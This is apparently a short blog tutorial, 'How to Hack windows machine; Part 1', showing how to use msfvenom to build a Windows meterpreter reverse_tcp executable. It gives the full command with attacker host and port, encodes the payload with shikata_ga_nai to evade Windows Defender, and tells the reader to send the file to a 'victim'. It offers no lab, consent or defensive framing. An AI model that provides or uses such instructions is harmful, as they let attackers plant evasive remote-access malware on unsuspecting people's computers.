How to Hack windows machine; Part 1

Note: This hack will work only if the Windows defender is turned off

Tools used

Kali Linux

Msfvenom(For creating Payload)

Msfconsole(For creating Listener)

Steps

For this part we need two thing;

  1. Payload – is nothing but the application that we use to exploit the user machine

      2. Listener – to receive data from the victim machine

In this this part, we will create a payload using msfvenom

First open the console and type msfvenom –list payload to see all the payload available

 

3. Type msfvenom –list encoders to see all the encoders

Encoders helps to encode our payload so that it cant be detected by windows evader (Mostly)

4. Now type

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.23 LPORT=444 -e x86/shikata_ga_nai -i 3 -f exe >final.exe

Explanation

-p –used to set payload. Here we use windows/meterpreter/reverse_tcp

LHOST –to set our host. Normally our ip

LPORT-to set the port where we want to listen

-e -use to set the encoder(Here we use shikata_ga_ni)

-i -use to iterate (How many time we want to encode)

-f –used to select format (Here we use exe format)

>filename.format – here we select the file name and format

Now send this File to the victim. In next tutorial we shall see how to create a listener

 

 

Leave a Comment